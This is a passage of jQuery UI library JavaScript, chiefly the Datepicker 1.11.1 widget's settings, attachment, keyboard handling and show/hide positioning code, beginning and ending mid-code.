) { // IE returns 0 when zIndex is not specified // other browsers return a string // we ignore the case of nested elements with an explicit value of 0 // <div style="z-index: -10;"><div style="z-index: 0;"></div></div> value = parseInt( elem.css( "zIndex" ), 10 ); if ( !isNaN( value ) && value !== 0 ) { return value; } } elem = elem.parent(); } } return 0; } }); // $.ui.plugin is deprecated. Use $.widget() extensions instead. 
$.ui.plugin = { add: function( module, option, set ) { var i, proto = $.ui[ module ].prototype; for ( i in set ) { proto.plugins[ i ] = proto.plugins[ i ] || []; proto.plugins[ i ].push( [ option, set[ i ] ] ); } }, call: function( instance, name, args, allowDisconnected ) { var i, set = instance.plugins[ name ]; if ( !set ) { return; } if ( !allowDisconnected && ( !instance.element[ 0 ].parentNode || instance.element[ 0 ].parentNode.nodeType === 11 ) ) { return; } for ( i = 0; i < set.length; i++ ) { if ( instance.options[ set[ i ][ 0 ] ] ) { set[ i ][ 1 ].apply( instance.element, args ); } } } }; /*! * jQuery UI Datepicker 1.11.1 * http://jqueryui.com * * Copyright 2014 jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/datepicker/ */ $.extend($.ui, { datepicker: { version: "1.11.1" } }); var datepicker_instActive; function datepicker_getZindex( elem ) { var position, value; while ( elem.length && elem[ 0 ] !== document ) { // Ignore z-index if position is set to a value where z-index is ignored by the browser // This makes behavior of this function consistent across browsers // WebKit always returns auto if the element is positioned position = elem.css( "position" ); if ( position === "absolute" || position === "relative" || position === "fixed" ) { // IE returns 0 when zIndex is not specified // other browsers return a string // we ignore the case of nested elements with an explicit value of 0 // <div style="z-index: -10;"><div style="z-index: 0;"></div></div> value = parseInt( elem.css( "zIndex" ), 10 ); if ( !isNaN( value ) && value !== 0 ) { return value; } } elem = elem.parent(); } return 0; } /* Date picker manager. Use the singleton instance of this class, $.datepicker, to interact with the date picker. Settings for (groups of) date pickers are maintained in an instance object, allowing multiple different settings on the same page. 
*/ function Datepicker() { this._curInst = null; // The current instance in use this._keyEvent = false; // If the last event was a key event this._disabledInputs = []; // List of date picker inputs that have been disabled this._datepickerShowing = false; // True if the popup picker is showing , false if not this._inDialog = false; // True if showing within a "dialog", false if not this._mainDivId = "ui-datepicker-div"; // The ID of the main datepicker division this._inlineClass = "ui-datepicker-inline"; // The name of the inline marker class this._appendClass = "ui-datepicker-append"; // The name of the append marker class this._triggerClass = "ui-datepicker-trigger"; // The name of the trigger marker class this._dialogClass = "ui-datepicker-dialog"; // The name of the dialog marker class this._disableClass = "ui-datepicker-disabled"; // The name of the disabled covering marker class this._unselectableClass = "ui-datepicker-unselectable"; // The name of the unselectable cell marker class this._currentClass = "ui-datepicker-current-day"; // The name of the current day marker class this._dayOverClass = "ui-datepicker-days-cell-over"; // The name of the day hover marker class this.regional = []; // Available regional settings, indexed by language code this.regional[""] = { // Default regional settings closeText: "Done", // Display text for close link prevText: "Prev", // Display text for previous month link nextText: "Next", // Display text for next month link currentText: "Today", // Display text for current month link monthNames: ["January","February","March","April","May","June", "July","August","September","October","November","December"], // Names of months for drop-down and formatting monthNamesShort: ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], // For formatting dayNames: ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"], // For formatting dayNamesShort: ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"], // For formatting dayNamesMin: ["Su","Mo","Tu","We","Th","Fr","Sa"], // Column headings for days starting at Sunday weekHeader: "Wk", // Column header for week of the year dateFormat: "mm/dd/yy", // See format options on parseDate firstDay: 0, // The first day of the week, Sun = 0, Mon = 1, ... isRTL: false, // True if right-to-left language, false if left-to-right showMonthAfterYear: false, // True if the year select precedes month, false for month then year yearSuffix: "" // Additional text to append to the year in the month headers }; this._defaults = { // Global defaults for all the date picker instances showOn: "focus", // "focus" for popup on focus, // "button" for trigger button, or "both" for either showAnim: "fadeIn", // Name of jQuery animation for popup showOptions: {}, // Options for enhanced animations defaultDate: null, // Used when field is blank: actual date, // +/-number for offset from today, null for today appendText: "", // Display text following the input box, e.g. 
showing the format buttonText: "...", // Text for trigger button buttonImage: "", // URL for trigger button image buttonImageOnly: false, // True if the image appears alone, false if it appears on a button hideIfNoPrevNext: false, // True to hide next/previous month links // if not applicable, false to just disable them navigationAsDateFormat: false, // True if date formatting applied to prev/today/next links gotoCurrent: false, // True if today link goes back to current selection instead changeMonth: false, // True if month can be selected directly, false if only prev/next changeYear: false, // True if year can be selected directly, false if only prev/next yearRange: "c-10:c+10", // Range of years to display in drop-down, // either relative to today's year (-nn:+nn), relative to currently displayed year // (c-nn:c+nn), absolute (nnnn:nnnn), or a combination of the above (nnnn:-n) showOtherMonths: false, // True to show dates in other months, false to leave blank selectOtherMonths: false, // True to allow selection of dates in other months, false for unselectable showWeek: false, // True to show week of the year, false to not show it calculateWeek: this.iso8601Week, // How to calculate the week of the year, // takes a Date and returns the number of the week for it shortYearCutoff: "+10", // Short year values < this are in the current century, // > this are in the previous century, // string value starting with "+" for current year + value minDate: null, // The earliest selectable date, or null for no limit maxDate: null, // The latest selectable date, or null for no limit duration: "fast", // Duration of display/closure beforeShowDay: null, // Function that takes a date and returns an array with // [0] = true if selectable, false if not, [1] = custom CSS class name(s) or "", // [2] = cell title (optional), e.g. $.datepicker.noWeekends beforeShow: null, // Function that takes an input field and // returns a set of custom settings for the date picker onSelect: null, // Define a callback function when a date is selected onChangeMonthYear: null, // Define a callback function when the month or year is changed onClose: null, // Define a callback function when the datepicker is closed numberOfMonths: 1, // Number of months to show at a time showCurrentAtPos: 0, // The position in multipe months at which to show the current month (starting at 0) stepMonths: 1, // Number of months to step back/forward stepBigMonths: 12, // Number of months to step back/forward for the big links altField: "", // Selector for an alternate field to store selected dates into altFormat: "", // The date format to use for the alternate field constrainInput: true, // The input is constrained by the current date format showButtonPanel: false, // True to show button panel, false to not show it autoSize: false, // True to size the input for the date format, false to leave as is disabled: false // The initial disabled state }; $.extend(this._defaults, this.regional[""]); this.regional.en = $.extend( true, {}, this.regional[ "" ]); this.regional[ "en-US" ] = $.extend( true, {}, this.regional.en ); this.dpDiv = datepicker_bindHover($("<div id='" + this._mainDivId + "' class='ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>")); } $.extend(Datepicker.prototype, { /* Class name added to elements to indicate already configured with a date picker. 
*/ markerClassName: "hasDatepicker", //Keep track of the maximum number of rows displayed (see #7043) maxRows: 4, // TODO rename to "widget" when switching to widget factory _widgetDatepicker: function() { return this.dpDiv; }, /* Override the default settings for all instances of the date picker. * @param settings object - the new settings to use as defaults (anonymous object) * @return the manager object */ setDefaults: function(settings) { datepicker_extendRemove(this._defaults, settings || {}); return this; }, /* Attach the date picker to a jQuery selection. * @param target element - the target input field or division or span * @param settings object - the new settings to use for this date picker instance (anonymous) */ _attachDatepicker: function(target, settings) { var nodeName, inline, inst; nodeName = target.nodeName.toLowerCase(); inline = (nodeName === "div" || nodeName === "span"); if (!target.id) { this.uuid += 1; target.id = "dp" + this.uuid; } inst = this._newInst($(target), inline); inst.settings = $.extend({}, settings || {}); if (nodeName === "input") { this._connectDatepicker(target, inst); } else if (inline) { this._inlineDatepicker(target, inst); } }, /* Create a new instance object. */ _newInst: function(target, inline) { var id = target[0].id.replace(/([^A-Za-z0-9_\-])/g, "\\\\$1"); // escape jQuery meta chars return {id: id, input: target, // associated target selectedDay: 0, selectedMonth: 0, selectedYear: 0, // current selection drawMonth: 0, drawYear: 0, // month being drawn inline: inline, // is datepicker inline or not dpDiv: (!inline ? this.dpDiv : // presentation div datepicker_bindHover($("<div class='" + this._inlineClass + " ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>")))}; }, /* Attach the date picker to an input field. */ _connectDatepicker: function(target, inst) { var input = $(target); inst.append = $([]); inst.trigger = $([]); if (input.hasClass(this.markerClassName)) { return; } this._attachments(input, inst); input.addClass(this.markerClassName).keydown(this._doKeyDown). keypress(this._doKeyPress).keyup(this._doKeyUp); this._autoSize(inst); $.data(target, "datepicker", inst); //If disabled option is true, disable the datepicker once it has been attached to the input (see ticket #5665) if( inst.settings.disabled ) { this._disableDatepicker( target ); } }, /* Make attachments based on settings. */ _attachments: function(input, inst) { var showOn, buttonText, buttonImage, appendText = this._get(inst, "appendText"), isRTL = this._get(inst, "isRTL"); if (inst.append) { inst.append.remove(); } if (appendText) { inst.append = $("<span class='" + this._appendClass + "'>" + appendText + "</span>"); input[isRTL ? "before" : "after"](inst.append); } input.unbind("focus", this._showDatepicker); if (inst.trigger) { inst.trigger.remove(); } showOn = this._get(inst, "showOn"); if (showOn === "focus" || showOn === "both") { // pop-up date picker when in the marked field input.focus(this._showDatepicker); } if (showOn === "button" || showOn === "both") { // pop-up date picker when button clicked buttonText = this._get(inst, "buttonText"); buttonImage = this._get(inst, "buttonImage"); inst.trigger = $(this._get(inst, "buttonImageOnly") ? $("<img/>").addClass(this._triggerClass). attr({ src: buttonImage, alt: buttonText, title: buttonText }) : $("<button type='button'></button>").addClass(this._triggerClass). html(!buttonImage ? buttonText : $("<img/>").attr( { src:buttonImage, alt:buttonText, title:buttonText }))); input[isRTL ? 
"before" : "after"](inst.trigger); inst.trigger.click(function() { if ($.datepicker._datepickerShowing && $.datepicker._lastInput === input[0]) { $.datepicker._hideDatepicker(); } else if ($.datepicker._datepickerShowing && $.datepicker._lastInput !== input[0]) { $.datepicker._hideDatepicker(); $.datepicker._showDatepicker(input[0]); } else { $.datepicker._showDatepicker(input[0]); } return false; }); } }, /* Apply the maximum length for the date format. */ _autoSize: function(inst) { if (this._get(inst, "autoSize") && !inst.inline) { var findMax, max, maxI, i, date = new Date(2009, 12 - 1, 20), // Ensure double digits dateFormat = this._get(inst, "dateFormat"); if (dateFormat.match(/[DM]/)) { findMax = function(names) { max = 0; maxI = 0; for (i = 0; i < names.length; i++) { if (names[i].length > max) { max = names[i].length; maxI = i; } } return maxI; }; date.setMonth(findMax(this._get(inst, (dateFormat.match(/MM/) ? "monthNames" : "monthNamesShort")))); date.setDate(findMax(this._get(inst, (dateFormat.match(/DD/) ? "dayNames" : "dayNamesShort"))) + 20 - date.getDay()); } inst.input.attr("size", this._formatDate(inst, date).length); } }, /* Attach an inline date picker to a div. */ _inlineDatepicker: function(target, inst) { var divSpan = $(target); if (divSpan.hasClass(this.markerClassName)) { return; } divSpan.addClass(this.markerClassName).append(inst.dpDiv); $.data(target, "datepicker", inst); this._setDate(inst, this._getDefaultDate(inst), true); this._updateDatepicker(inst); this._updateAlternate(inst); //If disabled option is true, disable the datepicker before showing it (see ticket #5665) if( inst.settings.disabled ) { this._disableDatepicker( target ); } // Set display:block in place of inst.dpDiv.show() which won't work on disconnected elements // http://bugs.jqueryui.com/ticket/7552 - A Datepicker created on a detached div has zero height inst.dpDiv.css( "display", "block" ); }, /* Pop-up the date picker in a "dialog" box. * @param input element - ignored * @param date string or Date - the initial date to display * @param onSelect function - the function to call when a date is selected * @param settings object - update the dialog date picker instance's settings (anonymous object) * @param pos int[2] - coordinates for the dialog's position within the screen or * event - with x/y coordinates or * leave empty for default (screen centre) * @return the manager object */ _dialogDatepicker: function(input, date, onSelect, settings, pos) { var id, browserWidth, browserHeight, scrollX, scrollY, inst = this._dialogInst; // internal instance if (!inst) { this.uuid += 1; id = "dp" + this.uuid; this._dialogInput = $("<input type='text' id='" + id + "' style='position: absolute; top: -100px; width: 0px;'/>"); this._dialogInput.keydown(this._doKeyDown); $("body").append(this._dialogInput); inst = this._dialogInst = this._newInst(this._dialogInput, false); inst.settings = {}; $.data(this._dialogInput[0], "datepicker", inst); } datepicker_extendRemove(inst.settings, settings || {}); date = (date && date.constructor === Date ? this._formatDate(inst, date) : date); this._dialogInput.val(date); this._pos = (pos ? (pos.length ? 
pos : [pos.pageX, pos.pageY]) : null); if (!this._pos) { browserWidth = document.documentElement.clientWidth; browserHeight = document.documentElement.clientHeight; scrollX = document.documentElement.scrollLeft || document.body.scrollLeft; scrollY = document.documentElement.scrollTop || document.body.scrollTop; this._pos = // should use actual width/height below [(browserWidth / 2) - 100 + scrollX, (browserHeight / 2) - 150 + scrollY]; } // move input on screen for focus, but hidden behind dialog this._dialogInput.css("left", (this._pos[0] + 20) + "px").css("top", this._pos[1] + "px"); inst.settings.onSelect = onSelect; this._inDialog = true; this.dpDiv.addClass(this._dialogClass); this._showDatepicker(this._dialogInput[0]); if ($.blockUI) { $.blockUI(this.dpDiv); } $.data(this._dialogInput[0], "datepicker", inst); return this; }, /* Detach a datepicker from its control. * @param target element - the target input field or division or span */ _destroyDatepicker: function(target) { var nodeName, $target = $(target), inst = $.data(target, "datepicker"); if (!$target.hasClass(this.markerClassName)) { return; } nodeName = target.nodeName.toLowerCase(); $.removeData(target, "datepicker"); if (nodeName === "input") { inst.append.remove(); inst.trigger.remove(); $target.removeClass(this.markerClassName). unbind("focus", this._showDatepicker). unbind("keydown", this._doKeyDown). unbind("keypress", this._doKeyPress). unbind("keyup", this._doKeyUp); } else if (nodeName === "div" || nodeName === "span") { $target.removeClass(this.markerClassName).empty(); } }, /* Enable the date picker to a jQuery selection. * @param target element - the target input field or division or span */ _enableDatepicker: function(target) { var nodeName, inline, $target = $(target), inst = $.data(target, "datepicker"); if (!$target.hasClass(this.markerClassName)) { return; } nodeName = target.nodeName.toLowerCase(); if (nodeName === "input") { target.disabled = false; inst.trigger.filter("button"). each(function() { this.disabled = false; }).end(). filter("img").css({opacity: "1.0", cursor: ""}); } else if (nodeName === "div" || nodeName === "span") { inline = $target.children("." + this._inlineClass); inline.children().removeClass("ui-state-disabled"); inline.find("select.ui-datepicker-month, select.ui-datepicker-year"). prop("disabled", false); } this._disabledInputs = $.map(this._disabledInputs, function(value) { return (value === target ? null : value); }); // delete entry }, /* Disable the date picker to a jQuery selection. * @param target element - the target input field or division or span */ _disableDatepicker: function(target) { var nodeName, inline, $target = $(target), inst = $.data(target, "datepicker"); if (!$target.hasClass(this.markerClassName)) { return; } nodeName = target.nodeName.toLowerCase(); if (nodeName === "input") { target.disabled = true; inst.trigger.filter("button"). each(function() { this.disabled = true; }).end(). filter("img").css({opacity: "0.5", cursor: "default"}); } else if (nodeName === "div" || nodeName === "span") { inline = $target.children("." + this._inlineClass); inline.children().addClass("ui-state-disabled"); inline.find("select.ui-datepicker-month, select.ui-datepicker-year"). prop("disabled", true); } this._disabledInputs = $.map(this._disabledInputs, function(value) { return (value === target ? null : value); }); // delete entry this._disabledInputs[this._disabledInputs.length] = target; }, /* Is the first field in a jQuery collection disabled as a datepicker? 
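 * User code reaches this check through the plugin command form, e.g.
 * (hypothetical "#date" selector):
 *
 *   var disabled = $("#date").datepicker("isDisabled"); // boolean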
* @param target element - the target input field or division or span * @return boolean - true if disabled, false if enabled */ _isDisabledDatepicker: function(target) { if (!target) { return false; } for (var i = 0; i < this._disabledInputs.length; i++) { if (this._disabledInputs[i] === target) { return true; } } return false; }, /* Retrieve the instance data for the target control. * @param target element - the target input field or division or span * @return object - the associated instance data * @throws error if a jQuery problem getting data */ _getInst: function(target) { try { return $.data(target, "datepicker"); } catch (err) { throw "Missing instance data for this datepicker"; } }, /* Update or retrieve the settings for a date picker attached to an input field or division. * @param target element - the target input field or division or span * @param name object - the new settings to update or * string - the name of the setting to change or retrieve, * when retrieving also "all" for all instance settings or * "defaults" for all global defaults * @param value any - the new value for the setting * (omit if above is an object or to retrieve a value) */ _optionDatepicker: function(target, name, value) { var settings, date, minDate, maxDate, inst = this._getInst(target); if (arguments.length === 2 && typeof name === "string") { return (name === "defaults" ? $.extend({}, $.datepicker._defaults) : (inst ? (name === "all" ? $.extend({}, inst.settings) : this._get(inst, name)) : null)); } settings = name || {}; if (typeof name === "string") { settings = {}; settings[name] = value; } if (inst) { if (this._curInst === inst) { this._hideDatepicker(); } date = this._getDateDatepicker(target, true); minDate = this._getMinMaxDate(inst, "min"); maxDate = this._getMinMaxDate(inst, "max"); datepicker_extendRemove(inst.settings, settings); // reformat the old minDate/maxDate values if dateFormat changes and a new minDate/maxDate isn't provided if (minDate !== null && settings.dateFormat !== undefined && settings.minDate === undefined) { inst.settings.minDate = this._formatDate(inst, minDate); } if (maxDate !== null && settings.dateFormat !== undefined && settings.maxDate === undefined) { inst.settings.maxDate = this._formatDate(inst, maxDate); } if ( "disabled" in settings ) { if ( settings.disabled ) { this._disableDatepicker(target); } else { this._enableDatepicker(target); } } this._attachments($(target), inst); this._autoSize(inst); this._setDate(inst, date); this._updateAlternate(inst); this._updateDatepicker(inst); } }, // change method deprecated _changeDatepicker: function(target, name, value) { this._optionDatepicker(target, name, value); }, /* Redraw the date picker attached to an input field or division. * @param target element - the target input field or division or span */ _refreshDatepicker: function(target) { var inst = this._getInst(target); if (inst) { this._updateDatepicker(inst); } }, /* Set the dates for a jQuery selection. * @param target element - the target input field or division or span * @param date Date - the new date */ _setDateDatepicker: function(target, date) { var inst = this._getInst(target); if (inst) { this._setDate(inst, date); this._updateDatepicker(inst); this._updateAlternate(inst); } }, /* Get the date(s) for the first entry in a jQuery selection. 
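 * Exposed to user code as the "getDate" command, e.g. (hypothetical selector):
 *
 *   var current = $("#date").datepicker("getDate"); // Date object, or null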
* @param target element - the target input field or division or span * @param noDefault boolean - true if no default date is to be used * @return Date - the current date */ _getDateDatepicker: function(target, noDefault) { var inst = this._getInst(target); if (inst && !inst.inline) { this._setDateFromField(inst, noDefault); } return (inst ? this._getDate(inst) : null); }, /* Handle keystrokes. */ _doKeyDown: function(event) { var onSelect, dateStr, sel, inst = $.datepicker._getInst(event.target), handled = true, isRTL = inst.dpDiv.is(".ui-datepicker-rtl"); inst._keyEvent = true; if ($.datepicker._datepickerShowing) { switch (event.keyCode) { case 9: $.datepicker._hideDatepicker(); handled = false; break; // hide on tab out case 13: sel = $("td." + $.datepicker._dayOverClass + ":not(." + $.datepicker._currentClass + ")", inst.dpDiv); if (sel[0]) { $.datepicker._selectDay(event.target, inst.selectedMonth, inst.selectedYear, sel[0]); } onSelect = $.datepicker._get(inst, "onSelect"); if (onSelect) { dateStr = $.datepicker._formatDate(inst); // trigger custom callback onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]); } else { $.datepicker._hideDatepicker(); } return false; // don't submit the form case 27: $.datepicker._hideDatepicker(); break; // hide on escape case 33: $.datepicker._adjustDate(event.target, (event.ctrlKey ? -$.datepicker._get(inst, "stepBigMonths") : -$.datepicker._get(inst, "stepMonths")), "M"); break; // previous month/year on page up/+ ctrl case 34: $.datepicker._adjustDate(event.target, (event.ctrlKey ? +$.datepicker._get(inst, "stepBigMonths") : +$.datepicker._get(inst, "stepMonths")), "M"); break; // next month/year on page down/+ ctrl case 35: if (event.ctrlKey || event.metaKey) { $.datepicker._clearDate(event.target); } handled = event.ctrlKey || event.metaKey; break; // clear on ctrl or command +end case 36: if (event.ctrlKey || event.metaKey) { $.datepicker._gotoToday(event.target); } handled = event.ctrlKey || event.metaKey; break; // current on ctrl or command +home case 37: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, (isRTL ? +1 : -1), "D"); } handled = event.ctrlKey || event.metaKey; // -1 day on ctrl or command +left if (event.originalEvent.altKey) { $.datepicker._adjustDate(event.target, (event.ctrlKey ? -$.datepicker._get(inst, "stepBigMonths") : -$.datepicker._get(inst, "stepMonths")), "M"); } // next month/year on alt +left on Mac break; case 38: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, -7, "D"); } handled = event.ctrlKey || event.metaKey; break; // -1 week on ctrl or command +up case 39: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, (isRTL ? -1 : +1), "D"); } handled = event.ctrlKey || event.metaKey; // +1 day on ctrl or command +right if (event.originalEvent.altKey) { $.datepicker._adjustDate(event.target, (event.ctrlKey ? +$.datepicker._get(inst, "stepBigMonths") : +$.datepicker._get(inst, "stepMonths")), "M"); } // next month/year on alt +right break; case 40: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, +7, "D"); } handled = event.ctrlKey || event.metaKey; break; // +1 week on ctrl or command +down default: handled = false; } } else if (event.keyCode === 36 && event.ctrlKey) { // display the date picker on ctrl+home $.datepicker._showDatepicker(this); } else { handled = false; } if (handled) { event.preventDefault(); event.stopPropagation(); } }, /* Filter entered characters - based on date format. 
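 * The filtering is governed by the constrainInput option; turning it off
 * lets any characters through, e.g. (hypothetical selector):
 *
 *   $("#date").datepicker({ constrainInput: false });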
*/ _doKeyPress: function(event) { var chars, chr, inst = $.datepicker._getInst(event.target); if ($.datepicker._get(inst, "constrainInput")) { chars = $.datepicker._possibleChars($.datepicker._get(inst, "dateFormat")); chr = String.fromCharCode(event.charCode == null ? event.keyCode : event.charCode); return event.ctrlKey || event.metaKey || (chr < " " || !chars || chars.indexOf(chr) > -1); } }, /* Synchronise manual entry and field/alternate field. */ _doKeyUp: function(event) { var date, inst = $.datepicker._getInst(event.target); if (inst.input.val() !== inst.lastVal) { try { date = $.datepicker.parseDate($.datepicker._get(inst, "dateFormat"), (inst.input ? inst.input.val() : null), $.datepicker._getFormatConfig(inst)); if (date) { // only if valid $.datepicker._setDateFromField(inst); $.datepicker._updateAlternate(inst); $.datepicker._updateDatepicker(inst); } } catch (err) { } } return true; }, /* Pop-up the date picker for a given input field. * If false returned from beforeShow event handler do not show. * @param input element - the input field attached to the date picker or * event - if triggered by focus */ _showDatepicker: function(input) { input = input.target || input; if (input.nodeName.toLowerCase() !== "input") { // find from button/image trigger input = $("input", input.parentNode)[0]; } if ($.datepicker._isDisabledDatepicker(input) || $.datepicker._lastInput === input) { // already here return; } var inst, beforeShow, beforeShowSettings, isFixed, offset, showAnim, duration; inst = $.datepicker._getInst(input); if ($.datepicker._curInst && $.datepicker._curInst !== inst) { $.datepicker._curInst.dpDiv.stop(true, true); if ( inst && $.datepicker._datepickerShowing ) { $.datepicker._hideDatepicker( $.datepicker._curInst.input[0] ); } } beforeShow = $.datepicker._get(inst, "beforeShow"); beforeShowSettings = beforeShow ? beforeShow.apply(input, [input, inst]) : {}; if(beforeShowSettings === false){ return; } datepicker_extendRemove(inst.settings, beforeShowSettings); inst.lastVal = null; $.datepicker._lastInput = input; $.datepicker._setDateFromField(inst); if ($.datepicker._inDialog) { // hide cursor input.value = ""; } if (!$.datepicker._pos) { // position below input $.datepicker._pos = $.datepicker._findPos(input); $.datepicker._pos[1] += input.offsetHeight; // add the height } isFixed = false; $(input).parents().each(function() { isFixed |= $(this).css("position") === "fixed"; return !isFixed; }); offset = {left: $.datepicker._pos[0], top: $.datepicker._pos[1]}; $.datepicker._pos = null; //to avoid flashes on Firefox inst.dpDiv.empty(); // determine sizing offscreen inst.dpDiv.css({position: "absolute", display: "block", top: "-1000px"}); $.datepicker._updateDatepicker(inst); // fix width for dynamic number of date pickers // and adjust position before showing offset = $.datepicker._checkOffset(inst, offset, isFixed); inst.dpDiv.css({position: ($.datepicker._inDialog && $.blockUI ? "static" : (isFixed ? "fixed" : "absolute")), display: "none", left: offset.left + "px", top: offset.top + "px"}); if (!inst.inline) { showAnim = $.datepicker._get(inst, "showAnim"); duration = $.datepicker._get(inst, "duration"); inst.dpDiv.css( "z-index", datepicker_getZindex( $( input ) ) + 1 ); $.datepicker._datepickerShowing = true; if ( $.effects && $.effects.effect[ showAnim ] ) { inst.dpDiv.show(showAnim, $.datepicker._get(inst, "showOptions"), duration); } else { inst.dpDiv[showAnim || "show"](showAnim ? 
duration : null); } if ( $.datepicker._shouldFocusInput( inst ) ) { inst.input.focus(); } $.datepicker._curInst = inst; } }, /* Generate the date picker content. */ _updateDatepicker: function(inst) { this.maxRows = 4; // Reset the max number of rows being displayed (see #7043) datepicker_instActive = inst; // for delegate hover events inst.dpDiv.empty().append(this._generateHTML(inst)); this._attachHandlers(inst); var origyearshtml, numMonths = this._getNumberOfMonths(inst), cols = numMonths[1], width = 17, activeCell = inst.dpDiv.find( "." + this._dayOverClass + " a" ); if ( activeCell.length > 0 ) { datepicker_handleMouseover.apply( activeCell.get( 0 ) ); } inst.dpDiv.removeClass("ui-datepicker-multi-2 ui-datepicker-multi-3 ui-datepicker-multi-4").width(""); if (cols > 1) { inst.dpDiv.addClass("ui-datepicker-multi-" + cols).css("width", (width * cols) + "em"); } inst.dpDiv[(numMonths[0] !== 1 || numMonths[1] !== 1 ? "add" : "remove") + "Class"]("ui-datepicker-multi"); inst.dpDiv[(this._get(inst, "isRTL") ? "add" : "remove") + "Class"]("ui-datepicker-rtl"); if (inst === $.datepicker._curInst && $.datepicker._datepickerShowing && $.datepicker._shouldFocusInput( inst ) ) { inst.input.focus(); } // deferred render of the years select (to avoid flashes on Firefox) if( inst.yearshtml ){ origyearshtml = inst.yearshtml; setTimeout(function(){ // ensure that inst.yearshtml didn't change. if( origyearshtml === inst.yearshtml && inst.yearshtml ){ inst.dpDiv.find("select.ui-datepicker-year:first").replaceWith(inst.yearshtml); } origyearshtml = inst.yearshtml = null; }, 0); } }, // #6694 - don't focus the input if it's already focused // this breaks the change event in IE // Support: IE and jQuery <1.9 _shouldFocusInput: function( inst ) { return inst.input && inst.input.is( ":visible" ) && !inst.input.is( ":disabled" ) && !inst.input.is( ":focus" ); }, /* Check positioning to remain on screen. */ _checkOffset: function(inst, offset, isFixed) { var dpWidth = inst.dpDiv.outerWidth(), dpHeight = inst.dpDiv.outerHeight(), inputWidth = inst.input ? inst.input.outerWidth() : 0, inputHeight = inst.input ? inst.input.outerHeight() : 0, viewWidth = document.documentElement.clientWidth + (isFixed ? 0 : $(document).scrollLeft()), viewHeight = document.documentElement.clientHeight + (isFixed ? 0 : $(document).scrollTop()); offset.left -= (this._get(inst, "isRTL") ? (dpWidth - inputWidth) : 0); offset.left -= (isFixed && offset.left === inst.input.offset().left) ? $(document).scrollLeft() : 0; offset.top -= (isFixed && offset.top === (inst.input.offset().top + inputHeight)) ? $(document).scrollTop() : 0; // now check if datepicker is showing outside window viewport - move to a better place if so. offset.left -= Math.min(offset.left, (offset.left + dpWidth > viewWidth && viewWidth > dpWidth) ? Math.abs(offset.left + dpWidth - viewWidth) : 0); offset.top -= Math.min(offset.top, (offset.top + dpHeight > viewHeight && viewHeight > dpHeight) ? Math.abs(dpHeight + inputHeight) : 0); return offset; }, /* Find an object's position on the screen. */ _findPos: function(obj) { var position, inst = this._getInst(obj), isRTL = this._get(inst, "isRTL"); while (obj && (obj.type === "hidden" || obj.nodeType !== 1 || $.expr.filters.hidden(obj))) { obj = obj[isRTL ? "previousSibling" : "nextSibling"]; } position = $(obj).offset(); return [position.left, position.top]; }, /* Hide the date picker from view.
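 * Also reachable from user code as the "hide" command, e.g.
 * (hypothetical selector):
 *
 *   $("#date").datepicker("hide");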
* @param input element - the input field attached to the date picker */ _hideDatepicker: function(input) { var showAnim, duration, postProcess, onClose, inst = this._curInst; if (!inst || (input && inst !== $.data(input, "datepicker"))) { return; } if (this._datepickerShowing) { showAnim = this._get(inst, "showAnim"); duration = this._get(inst, "duration"); postProcess = function() { $.datepicker._tidyDialog(inst); }; // DEPRECATED: after BC for 1.8.x $.effects[ showAnim ] is not needed if ( $.effects && ( $.effects.effect[ showAnim ] || $.effects[ showAnim ] ) ) { inst.dpDiv.hide(showAnim, $.datepicker._get(inst, "showOptions"), duration, postProcess); } else { inst.dpDiv[(showAnim === "slideDown" ? "slideUp" : (showAnim === "fadeIn" ? "fadeOut" : "hide"))]((showAnim ? duration : null), postProcess); } if (!showAnim) { postProcess(); } this._datepickerShowing = false; onClose = this._get(inst, "onClose"); if (onClose) { onClose.apply((inst.input ? inst.input[0] : null), [(inst.input ? inst.input.val() : ""), inst]); } this._lastInput = null; if (this._inDialog) { this._dialogInput.css({ position: "absolute", left: "0", top: "-100px" }); if ($.blockUI) { $.unblockUI(); $("body").append(this.dpDiv); } } this._inDialog = false; } }, /* Tidy up after a dialog display. */ _tidyDialog: function(inst) { inst.dpDiv.removeClass(this._dialogClass).unbind(".ui-datepicker-calendar"); }, /* Close date picker if clicked elsewhere. */ _checkExternalClick: function(event) { if (!$.datepicker._curInst) { return; } var $target = $(event.target), inst = $.datepicker._getInst($target[0]); if ( ( ( $target[0].id !== $.datepicker._mainDivId && $target.parents("#" + $.datepicker._mainDivId).length === 0 && !$target.hasClass($.datepicker.markerClassName) && !$target.closest("." + $.datepicker._triggerClass).length && $.datepicker._datepickerShowing && !($.datepicker._inDialog && $.blockUI) ) ) || ( $target.hasClass($.datepicker.markerClassName) && $.datepicker._curInst !== inst ) ) { $.datepicker._hideDatepicker(); } }, /* Adjust one of the date sub-fields. */ _adjustDate: function(id, offset, period) { var target = $(id), inst = this._getInst(target[0]); if (this._isDisabledDatepicker(target[0])) { return; } this._adjustInstDate(inst, offset + (period === "M" ? this._get(inst, "showCurrentAtPos") : 0), // undo positioning period); this._updateDatepicker(inst); }, /* Action for current link. */ _gotoToday: function(id) { var date, target = $(id), inst = this._getInst(target[0]); if (this._get(inst, "gotoCurrent") && inst.currentDay) { inst.selectedDay = inst.currentDay; inst.drawMonth = inst.selectedMonth = inst.currentMonth; inst.drawYear = inst.selectedYear = inst.currentYear; } else { date = new Date(); inst.selectedDay = date.getDate(); inst.drawMonth = inst.selectedMonth = date.getMonth(); inst.drawYear = inst.selectedYear = date.getFullYear(); } this._notifyChange(inst); this._adjustDate(target); }, /* Action for selecting a new month/year. */ _selectMonthYear: function(id, select, period) { var target = $(id), inst = this._getInst(target[0]); inst["selected" + (period === "M" ? "Month" : "Year")] = inst["draw" + (period === "M" ? "Month" : "Year")] = parseInt(select.options[select.selectedIndex].value,10); this._notifyChange(inst); this._adjustDate(target); }, /* Action for selecting a day. 
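 * This handler services clicks on day cells; programmatic selection from
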